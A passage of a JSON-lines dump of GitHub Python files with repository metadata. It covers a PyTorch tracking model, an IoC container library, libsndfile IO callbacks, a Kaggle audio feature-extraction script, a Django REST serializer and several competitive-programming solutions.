fq_inr=fq_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fq=self.encoder(fq, src_key_padding_mask=fq_mask, pos=fq_pos, inr=fq_inr)\n fq=fq.permute(1,2,0).view(b,c,w,h)\n fq_list={}\n\n fq_list[\"fq\"]=fq\n fq_list[\"fq_mask\"]=fq_mask\n fq_list[\"fq_pos\"]=fq_pos\n fq_list[\"fq_inr\"]=fq_inr\n\n fcos_cls_score_final, fcos_ctr_score_final, fcos_bbox_final, corr_fea = self.head(fm, fq_list)\n predict_data = dict(\n cls_pred=fcos_cls_score_final,\n ctr_pred=fcos_ctr_score_final,\n box_pred=fcos_bbox_final,\n )\n if self._hyper_params[\"corr_fea_output\"]:\n predict_data[\"corr_fea\"] = corr_fea\n return predict_data\n\n def forward(self, *args, phase=None):\n if phase is None:\n phase = self._phase\n # used during training\n if phase == 'train':\n # resolve training data\n if self._hyper_params[\"amp\"]:\n with torch.cuda.amp.autocast():\n return self.train_forward(args[0])\n else:\n return self.train_forward(args[0])\n\n elif phase == 'memorize':\n target_img,mask, fg_bg_label_map = args\n fm = self.memorize(target_img,mask, fg_bg_label_map)\n out_list = fm\n\n elif phase == 'track':\n assert len(args) == 3\n search_img,serach_mask, fm = args\n fq = self.basemodel_q(search_img)\n fq = self.neck_q(fq) # B, C, H, W\n\n fq_mask = F.interpolate(serach_mask, size=fq.shape[-2:]).to(torch.bool)\n b,t,h,w=fq_mask.size()\n fq_mask=fq_mask.view(b*t,h,w)\n fq_pos=self.p_e(fq,fq_mask)\n fq_inr=self.i_e(fq,fq_mask)\n b,c,w,h=fq.size()\n fq=(fq).view(b,c,-1).permute(2, 0, 1).contiguous()\n fq_mask=fq_mask.permute(1,2,0).view(-1,b).contiguous()\n fq_pos=(fq_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fq_inr.size()\n fq_inr=fq_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fq=self.encoder(fq, src_key_padding_mask=fq_mask, pos=fq_pos, inr=fq_inr)\n fq=fq.permute(1,2,0).view(b,c,w,h)\n fq_list={}\n fq_list[\"fq\"]=fq\n fq_list[\"fq_mask\"]=fq_mask\n fq_list[\"fq_pos\"]=fq_pos\n fq_list[\"fq_inr\"]=fq_inr\n fcos_cls_score_final, fcos_ctr_score_final, fcos_bbox_final, corr_fea = self.head(\n fm, fq_list, search_img.size(-1))\n # apply sigmoid\n fcos_cls_prob_final = torch.sigmoid(fcos_cls_score_final)\n fcos_ctr_prob_final = torch.sigmoid(fcos_ctr_score_final)\n # apply centerness correction\n fcos_score_final = fcos_cls_prob_final * fcos_ctr_prob_final\n\n extra = dict()\n # output\n out_list = fcos_score_final, fcos_bbox_final, fcos_cls_prob_final, fcos_ctr_prob_final, extra\n else:\n raise ValueError(\"Phase non-implemented.\")\n\n return out_list\n\n def update_params(self):\n self._make_convs()\n self._initialize_conv()\n super().update_params()\n\n def _make_convs(self):\n head_width = self._hyper_params['head_width']\n\n # feature adjustment\n self.r_z_k = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.c_z_k = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.r_x = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.c_x = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n\n def _initialize_conv(self, ):\n conv_weight_std = self._hyper_params['conv_weight_std']\n conv_list = [\n self.r_z_k.conv, self.c_z_k.conv, self.r_x.conv, self.c_x.conv\n ]\n for ith in range(len(conv_list)):\n conv = conv_list[ith]\n torch.nn.init.normal_(conv.weight,\n std=conv_weight_std) # conv_weight_std=0.01\n\n def set_device(self, dev):\n if not isinstance(dev, torch.device):\n dev = torch.device(dev)\n self.to(dev)\n if self.loss is not None:\n for loss_name in self.loss:\n self.loss[loss_name].to(dev)\n","repo_name":"WayEnSun/HTFormer","sub_path":"videoanalyst/model/task_model/taskmodel_impl/stmtrack_model.py","file_name":"stmtrack_model.py","file_ext":"py","file_size_in_byte":10029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7707577462","text":"from abc import abstractmethod\nfrom typing import Any, List, TypeVar, ContextManager, Callable, Iterable\nfrom contextlib import ExitStack, nullcontext\nfrom threading import RLock\nfrom types import MappingProxyType\nfrom logging import getLogger\n\nfrom .err import ServiceNotFoundError\nfrom .symbols import Symbols\nfrom ._servicesmap import ServicesMap\nfrom .ioc_resolver import IServiceInfoResolver, ServiceInfoChainResolver\nfrom .ioc_service_info import (\n LifeTime,\n IServiceInfo,\n ServiceInfo,\n ProviderServiceInfo,\n GetAttrServiceInfo,\n ValueServiceInfo,\n GroupedServiceInfo,\n BindedServiceInfo,\n CallerFrameServiceInfo\n)\nfrom ._utils import wrap_signature as _wrap_signature\n\n_T = TypeVar(\"_T\")\n\n_logger = getLogger(__name__)\n\n\nclass IServiceProvider:\n '''\n the base interface for `ServiceProvider`.\n '''\n\n @abstractmethod\n def __getitem__(self, key):\n raise NotImplementedError\n\n @abstractmethod\n def get(self, key, d=None) -> Any:\n '''\n get a service by key.\n '''\n raise NotImplementedError\n\n @abstractmethod\n def get_many(self, key) -> List[Any]:\n '''\n get services by key.\n '''\n raise NotImplementedError\n\n @abstractmethod\n def scope(self):\n '''\n create a scoped service provider for get scoped services.\n '''\n raise NotImplementedError\n\n\nclass ServiceProvider(IServiceProvider):\n def __init__(self, auto_enter=False, *,\n # internal uses:\n _services: ServicesMap=None, _parent: 'ServiceProvider'=None\n ):\n\n self._exit_stack = None\n self._scoped_cache = {}\n self._parent = _parent\n\n assert (_parent is None) is (_services is None)\n\n if _parent is not None:\n # scope provider\n assert auto_enter is False, 'must be default value'\n self._services = _services\n self._root: ServiceProvider = _parent._root\n self._lock = nullcontext()\n\n else:\n # root provider\n self._services = ServicesMap()\n self._root: ServiceProvider = self\n self._lock = RLock()\n\n provider_service_info = ProviderServiceInfo()\n self._services[Symbols.provider] = provider_service_info\n self._services[Symbols.provider_root] = ValueServiceInfo(self)\n self._services[Symbols.provider_parent] = GetAttrServiceInfo('_parent')\n self._services[Symbols.cache] = GetAttrServiceInfo('_scoped_cache')\n self._services[Symbols.missing_resolver] = ValueServiceInfo(ServiceInfoChainResolver())\n self._services[Symbols.caller_frame] = CallerFrameServiceInfo()\n\n self.__init_hooks = []\n self.__init_exc = None\n\n # service alias\n self._services['ioc'] = provider_service_info\n self._services['provider'] = provider_service_info\n self._services['service_provider'] = provider_service_info\n self._services[ServiceProvider] = provider_service_info\n self._services[IServiceProvider] = provider_service_info\n\n # options\n self._services[Symbols.provider_options] = ValueServiceInfo(MappingProxyType(\n dict(\n auto_enter=auto_enter\n )\n ))\n\n assert self._root is not None\n\n def add_init_hook(self, func: Callable):\n func = _wrap_signature(func)\n if self.__init_hooks is not None:\n with self._lock:\n if self.__init_hooks is not None:\n self.__init_hooks.append(func)\n return\n raise RuntimeError('Cannot add init hook after initialized.')\n\n def __ensure_init_hooks_called(self):\n if self.__init_hooks is not None or self.__init_exc is not None:\n with self._lock:\n if self.__init_exc is not None:\n raise self.__init_exc\n if self.__init_hooks is not None:\n _logger.debug('call init hooks')\n hooks = self.__init_hooks\n self.__init_hooks = None\n\n disposable = self._services.add(Symbols.at_init, ValueServiceInfo(True))\n try:\n for func in hooks:\n func(self)\n except Exception as e:\n self.__init_exc = e\n raise\n disposable()\n self._services.add(Symbols.at_init, ValueServiceInfo(False))\n\n def _get_service_info(self, key) -> IServiceInfo:\n try:\n return self._services[key]\n except KeyError:\n pass\n # load missing resolver and resolve service info.\n resolver: IServiceInfoResolver = self._services[Symbols.missing_resolver].get(self)\n return resolver.get(self, key)\n\n def __getitem__(self, key):\n _logger.debug('get service by key: %r', key)\n self._root.__ensure_init_hooks_called()\n service_info = self._get_service_info(key)\n try:\n return service_info.get(self)\n except ServiceNotFoundError as err:\n raise ServiceNotFoundError(key, *err.resolve_chain)\n\n def get(self, key, d=None) -> Any:\n '''\n get a service by key.\n '''\n try:\n return self[key]\n except ServiceNotFoundError as err:\n if len(err.resolve_chain) == 1:\n return d\n raise\n\n def get_many(self, key) -> List[Any]:\n '''\n get services by key.\n\n ### example\n\n when you registered multi services with the same key,\n you can get them all:\n\n ``` py\n provider.register_value('a', 1)\n provider.register_value('a', 2)\n assert provider.get_many('a') == [2, 1] # rev order\n ```\n '''\n _logger.debug('get services by key: %r', key)\n self._root.__ensure_init_hooks_called()\n service_infos: Iterable[IServiceInfo] = self._services.get_many(key)\n try:\n return [si.get(self) for si in service_infos]\n except ServiceNotFoundError as err:\n raise ServiceNotFoundError(key, *err.resolve_chain)\n\n def enter(self, context: ContextManager[_T]):\n '''\n enter the context.\n\n returns the result of the `context.__enter__()` method.\n '''\n with self._lock:\n if self._exit_stack is None:\n self._exit_stack = ExitStack()\n return self._exit_stack.enter_context(context)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n with self._lock:\n if self._exit_stack is not None:\n self._exit_stack.__exit__(*args)\n self._exit_stack = None\n\n def register_service_info(self, key, service_info: IServiceInfo):\n '''\n register a `IServiceInfo` by key.\n '''\n if not isinstance(service_info, IServiceInfo):\n raise TypeError('service_info must be instance of IServiceInfo.')\n _logger.debug('register %r with key %r', service_info, key)\n return self._services.add(key, service_info)\n\n def register(self, key, factory, lifetime):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register_service_info(key, ServiceInfo(self, key, factory, lifetime))\n\n def register_singleton(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.singleton)\n\n def register_scoped(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.scoped)\n\n def register_transient(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.transient)\n\n def register_value(self, key, value):\n '''\n register a value by key.\n\n equals `register_transient(key, lambda ioc: value)`\n '''\n return self.register_service_info(key, ValueServiceInfo(value))\n\n def register_group(self, key, keys: list):\n '''\n register a grouped `key` for get other `keys`.\n\n the `keys` can be a ref and you can update it later.\n\n for example:\n\n ``` py\n provider.register_value('str', 'name')\n provider.register_value('int', 1)\n provider.register_group('any', ['str', 'int'])\n assert provider['any'] == ('name', 1)\n ```\n\n equals `register_transient(key, lambda ioc: tuple(ioc[k] for k in keys))`\n '''\n return self.register_service_info(key, GroupedServiceInfo(keys))\n\n def register_bind(self, new_key, target_key):\n '''\n bind `new_key` to `target_key` so\n you can use `new_key` as key to get value from service provider.\n\n equals `register_transient(new_key, lambda ioc: ioc[target_key])`\n '''\n return self.register_service_info(new_key, BindedServiceInfo(target_key))\n\n def scope(self):\n '''\n create a scoped service provider.\n '''\n ssp = ServiceProvider(_services=self._services.scope(), _parent=self)\n return self.enter(ssp)\n\n @property\n def builder(self):\n '''\n get a new `ServiceProviderBuilder` wrapper for this `ServiceProvider`.\n '''\n from .builder import ServiceProviderBuilder\n return ServiceProviderBuilder(self)\n","repo_name":"Cologler/anyioc-python","sub_path":"anyioc/ioc.py","file_name":"ioc.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18940740389","text":"from ._sndfile import lib, ffi\n\n\n@ffi.def_extern()\ndef vio_get_filelen(user_data):\n fobj = ffi.from_handle(user_data)\n\n saved_pos = fobj.tell()\n end = fobj.seek(0, 2)\n fobj.seek(0, saved_pos)\n return end\n\n\n@ffi.def_extern()\ndef vio_seek(offset, whence, user_data):\n fobj = ffi.from_handle(user_data)\n return fobj.seek(offset, whence)\n\n\n@ffi.def_extern()\ndef vio_read(ptr, count, user_data):\n fobj = ffi.from_handle(user_data)\n buf = ffi.cast(\"char *\", ptr)\n\n chunk = fobj.read(count)\n count = len(chunk)\n buf[0:count] = chunk\n return count\n\n\n@ffi.def_extern()\ndef vio_write(ptr, count, user_data):\n fobj = ffi.from_handle(user_data)\n buf = ffi.cast(\"char *\", ptr)\n\n return fobj.write(buf[0:count])\n\n\n@ffi.def_extern()\ndef vio_tell(user_data):\n fobj = ffi.from_handle(user_data)\n return fobj.tell()\n\n\ndef get_vio_table():\n return ffi.new(\n \"SF_VIRTUAL_IO *\", {\n 'get_filelen': lib.vio_get_filelen,\n 'seek': lib.vio_seek,\n 'read': lib.vio_read,\n 'write': lib.vio_write,\n 'tell': lib.vio_tell\n })\n","repo_name":"sangoma/sndfile","sub_path":"sndfile/vio.py","file_name":"vio.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8851658607","text":"'''\n========================================================================================\nThis module is responsible for the following:\n1. As a first step, chunking and padding of variable audio length files are performed.\n2. The chunked files are of 4 secs.\n3. This module generates the Feature Set - I, as described in the paper.\n\nThis module uses Multiprocessing to speed-up the feature engineering part.\n========================================================================================\n\nInput: Train and Test .wav files - variable length\nOutput: \n 1. Train and Test .wav files - fixed length of 4 secs, with 10% overlap in each chunks.\n 2. Mel-scaled spectograms for Feature Set - I, in the form of pickle files.\n The generated pickles for the spectograms have been split into two parts since the single file crosses the valid\n file size.\n'''\n\n\nimport os\nimport numpy as np\nimport IPython\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport IPython.display as ipd # To play sound in the notebook\nimport librosa\nfrom librosa import display\nimport pandas as pd\nimport pickle\nimport math\nfrom time import time\nfrom multiprocessing import Pool\nfrom joblib import Parallel, delayed\nimport socket, errno, sys\n\n\nnp.random.seed(1)\n\nrootDir = \"/home/ubuntu/kaggle/audioTagger/\"\n\nclass Config(object):\n def __init__(self,\n sampling_rate=22050, n_classes=41,\n #data_dir=rootDir+'input/audio_train_trimmed',\n n_mels=64, frame_weigth=80, frame_shift=10):\n self.sampling_rate = sampling_rate\n self.n_classes = n_classes\n #self.data_dir = data_dir\n self.n_fft = int(frame_weigth / 1000 * sampling_rate)\n self.n_mels = n_mels\n self.frame_weigth = frame_weigth\n self.frame_shift = frame_shift\n self.hop_length = int(frame_shift / 1000 * sampling_rate)\n\n \n \ndef extractFeatures(row, duration=3, cut_duration = 4):\n try:\n fn = row[0]\n data_dir = row[1]\n fname = os.path.join(data_dir, fn) \n #data, _ = librosa.load(fname, sr=config.sampling_rate, duration=duration)\n audio, _ = librosa.load(fname, sr=config.sampling_rate)\n tot_duration = librosa.core.get_duration(audio)\n numSamples = math.ceil(tot_duration/cut_duration)\n logMelCollection = []\n fnameCollection = []\n end_marker = 0\n part_marker = 0\n while end_marker < tot_duration: \n if end_marker == 0:\n offset = 0\n else:\n ## Cut samples with 10% overlap\n offset = (offset + cut_duration) - (cut_duration*0.1)\n end_marker = offset + cut_duration\n data, _ = librosa.load(fname, sr=config.sampling_rate, offset = offset, duration = cut_duration)\n librosa.output.write_wav(data_dir+'4secs/'+'part'+str(part_marker)+'_'+fn, data, config.sampling_rate)\n melspec = librosa.feature.melspectrogram(data, sr=config.sampling_rate,\n n_fft=config.n_fft, hop_length=config.hop_length,\n n_mels=config.n_mels)\n logmel = librosa.core.power_to_db(melspec) \n logMelCollection.append(logmel)\n fnameCollection.append(fn)\n part_marker = part_marker+1\n return logMelCollection, fnameCollection \n except Exception as e:\n print(\"Error processing file: \",fn) \n print(\"Numsamples: \",numSamples)\n print(\"Total duration: \",tot_duration)\n\n\nconfig = Config(frame_weigth=80, frame_shift=10)\n\ntrain = pd.read_csv(rootDir + \"input/train.csv\")\ntest = pd.read_csv(rootDir + \"input/sample_submission.csv\")\nprint(\"Removing bad files from test\")\nexclusionFiles = ['0b0427e2.wav','6ea0099f.wav','b39975f5.wav']\ntest = test[~test['fname'].isin(exclusionFiles)]\ntest.reset_index(drop=True, inplace = True)\n\nfile_counter = 1 \nfilesToBeProcessed = []\nfor filename in train.fname:\n if file_counter % 1000 == 0:\n print(file_counter)\n #print(\"Processing :\",filename)\n filesToBeProcessed.append((filename, rootDir+'input/audio_train_trimmed/'))\n file_counter = file_counter+1 \n\nnumToProcess = len(filesToBeProcessed)\nprint(\"Number of files to process: Train set\", numToProcess) \n\nt0 = time()\nnumSubprocess = 50\nprint(\"Starting multiprocessing with\", numSubprocess, \"subprocesses...\" )\npool = Pool(numSubprocess)\ntry:\n resultSet = pool.map(extractFeatures, filesToBeProcessed)\n pool.close()\n pool.join()\nexcept socket.error as e:\n if e.errno == errno.EPIPE:\n #remote peer disconnected\n print ({'Status':'Remote Disconnected Error'})\n else:\n print ({'Status':'Other Socket Error'})\nexcept IOError as e: \n print ({'Status':'IOError'})\n\n\nfilenames = []\nX = []\nfor result in resultSet:\n\tfor file_names in result[1]:\n\t\tfilenames.append(file_names)\n\tfor sound_sequence in result[0]:\n\t\tX.append(sound_sequence)\n\nmax_length = np.max([x.shape[1] for x in X])\n# Pad zero to make them all the same length\nX2 = [np.pad(x, ((0, 0), (0, max_length - x.shape[1])), 'constant') for x in X]\n\nmelSpectogramTrain = np.array(X2)\n\nprint(\"Shape of melSpectogramTrain: \", melSpectogramTrain.shape)\nrows = melSpectogramTrain.shape[0]\nrowsToSave = int(rows/2)\nwith open(rootDir + \"input/audio_train_trimmed/4secs/melSpectogramTrain_p1.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTrain[:rowsToSave], handle) \n\nwith open(rootDir + \"input/audio_train_trimmed/4secs/melSpectogramTrain_p2.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTrain[rowsToSave:], handle) \n \nwith open(rootDir + \"input/audio_train_trimmed/4secs/filenamesTrain.pkl\", 'wb') as handle:\n pickle.dump(filenames, handle) \n \n################ FOR TEST FILES #########################\n\n\nfile_counter = 1 \nfilesToBeProcessed = []\nfor filename in test.fname:\n if file_counter % 1000 == 0:\n print(file_counter)\n #print(\"Processing :\",filename)\n filesToBeProcessed.append((filename, rootDir+'input/audio_test_trimmed/'))\n file_counter = file_counter+1 \n\nnumToProcess = len(filesToBeProcessed)\nprint(\"Number of files to process: Test set\", numToProcess) \n\nt0 = time()\nnumSubprocess = 50\nprint(\"Starting multiprocessing with\", numSubprocess, \"subprocesses...\" )\npool = Pool(numSubprocess)\ntry:\n resultSet = pool.map(extractFeatures, filesToBeProcessed)\n pool.close()\n pool.join()\nexcept socket.error as e:\n if e.errno == errno.EPIPE:\n #remote peer disconnected\n print ({'Status':'Remote Disconnected Error'})\n else:\n print ({'Status':'Other Socket Error'})\nexcept IOError as e: \n print ({'Status':'IOError'})\n \nfilenames = []\nX = []\nfor result in resultSet:\n\tfor file_names in result[1]:\n\t\tfilenames.append(file_names)\n\tfor sound_sequence in result[0]:\n\t\tX.append(sound_sequence)\n\nmax_length = np.max([x.shape[1] for x in X])\n# Pad zero to make them all the same length\nX2 = [np.pad(x, ((0, 0), (0, max_length - x.shape[1])), 'constant') for x in X]\n\nmelSpectogramTest = np.array(X2)\n\nprint(\"Shape of melSpectogramTest: \", melSpectogramTest.shape)\nwith open(rootDir + \"input/audio_test_trimmed/4secs/melSpectogramTest.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTest, handle) \n\nwith open(rootDir + \"input/audio_test_trimmed/4secs/filenamesTest.pkl\", 'wb') as handle:\n pickle.dump(filenames, handle) \n \n\n","repo_name":"Gyat/Kaggle_DCASE2018_21st_Solution","sub_path":"FeatureSet_I_With_Chunking.py","file_name":"FeatureSet_I_With_Chunking.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22407273536","text":"from rest_framework import serializers\nfrom .models import Link\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nclass LinkSerializer(serializers.ModelSerializer):\n class Meta:\n model = Link\n fields = [\"name\",\"url\"]\n\nclass CustomTokenObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n token['username'] = user.username\n return token","repo_name":"anirudh-tiwari/rss-backend","sub_path":"rss_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121548626","text":"# https://atcoder.jp/contests/typical90/submissions/23847062\n# 043 - Maze Challenge with Lack of Sleep(★4)\nimport sys\nfrom collections import deque\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nMOD = 10 ** 9 + 7\n\n\ndef solve():\n H, W = map(int, input().split())\n rs, cs = map(lambda z: int(z) - 1, input().split())\n rt, ct, = map(lambda z: int(z) - 1, input().split())\n S = tuple(input().rstrip() for _ in range(H))\n\n dp = [[[f_inf] * W for _ in range(H)] for _ in range(2)]\n dp[0][rs][cs] = dp[1][rs][cs] = 0\n que = deque([(-1, rs, cs)]) # (直前の向き, 今いるノードの行, 今いるノードの列)\n while que:\n p, h, w = que.popleft()\n for dh, dw in ((0, 1), (1, 0), (0, -1), (-1, 0)):\n next_h, next_w = h + dh, w + dw\n if next_h < 0 or next_w < 0 or next_h >= H or next_w >= W or S[next_h][next_w] == \"#\":\n continue\n u = 0 if dh == 0 else 1 # u=0:上下移動, u=1:左右移動\n x = 0 if p == -1 or p == u else 1 # 向きが直前から変えるならコスト+1\n cost = dp[p][h][w] + x\n if dp[u][next_h][next_w] > cost:\n dp[u][next_h][next_w] = cost\n que.appendleft((u, next_h, next_w)) if x == 0 else que.append((u, next_h, next_w))\n print(min(dp[0][rt][ct], dp[1][rt][ct]))\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/Typical90/Typical90_043.py","file_name":"Typical90_043.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32658922569","text":"import sys\n\nn = int(sys.stdin.readline())\n\n# 크리스마스 트리 형태\n# 마지막 row에서 찍어야할 별의 갯수\nstar = 2*n - 1\n\nfor i in range(n) :\n for j in range(star) :\n if (n-1) - i <= j <= (n-1) + i :\n print(\"*\",end='')\n # 해당 row에서 별을 다 찍고나면 바로 다음 순서로 넘어가야한다.\n if j == (n-1) + i :\n break \n else :\n print(end=' ')\n print()\n\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/구현/2442_별찍기5.py","file_name":"2442_별찍기5.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37536904069","text":"import sys\n\ntotal = 0\n\nfor i, line in enumerate(sys.stdin):\n signals, four_digit_output = [x.split() for x in line.split('|')]\n\n digit_encodings = {}\n\n # By sorting the signals by length, we can decode the \"easy\" signals\n # 1, 7 and 4 first. Then use those to disambiguate the 5-segment\n # and 6-segment digits by using knowledge of how the digit shapes\n # overlap.\n for raw_signal in sorted(signals, key=len):\n signal = frozenset(raw_signal)\n\n if len(signal) == 2:\n digit_encodings[1] = signal\n elif len(signal) == 3:\n digit_encodings[7] = signal\n elif len(signal) == 4:\n digit_encodings[4] = signal\n\n # We need to differentiate the 5-segment digits using some tricks.\n # The 5-segment digits are 2, 3, and 5.\n elif len(signal) == 5:\n # Trick #1: find \"3\".\n #\n # The \"3\" shape is the only 5-segment digit that contains\n # the \"1\" shape as a subset.\n if digit_encodings[1].issubset(signal):\n digit_encodings[3] = signal\n # Trick #2: find \"5\".\n #\n # The \"4\" digit uses segments b + d. You can narrow down the possible\n # wires for those segments by subtracting the \"1\" shape from the \"4\" shape,\n # leaving two possible wires.\n #\n # The \"5\" digit is the only digit that also uses *both* of those wires.\n elif (digit_encodings[4] - digit_encodings[1]).issubset(signal):\n digit_encodings[5] = signal\n # The other possible 5-segment digit is \"2\", soooo...\n else:\n digit_encodings[2] = signal\n\n # Similarly, let's use some tricks to disambiguate the 6-segment digits.\n # The 6-segment digits are 0, 6 and 9.\n elif len(signal) == 6:\n # Trick #1: find \"9\".\n #\n # The \"4\" shape is a subset of the \"9\" shape, unlike \"0\" (which lacks\n # segment d) and \"6\" (which lacks segment c).\n if digit_encodings[4].issubset(signal):\n digit_encodings[9] = signal\n # Trick #2: find \"0\".\n #\n # \"0\" is the only shape which has \"7\" as a sub-shape but not \"4\".\n # Since we reached this condition, we already know 4 is not\n # a subset of this signal's shape. So...\n elif digit_encodings[7].issubset(signal):\n digit_encodings[0] = signal\n # The other possible 6-segment digit is \"6\"\n else:\n digit_encodings[6] = signal\n elif len(signal) == 7:\n digit_encodings[8] = signal\n\n # Invert the map so we can easily look up the signal for each digit\n signal_to_digit = { signal: digit for digit, signal in digit_encodings.items() }\n\n output_number = 0\n four_digit_output.reverse()\n for i, raw_output_signal in enumerate(four_digit_output):\n output_signal = frozenset(raw_output_signal)\n digit = signal_to_digit[output_signal]\n output_number += 10 ** i * digit\n\n total += output_number\n\nprint(total)\n","repo_name":"cycleseven/advent-2021","sub_path":"08/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}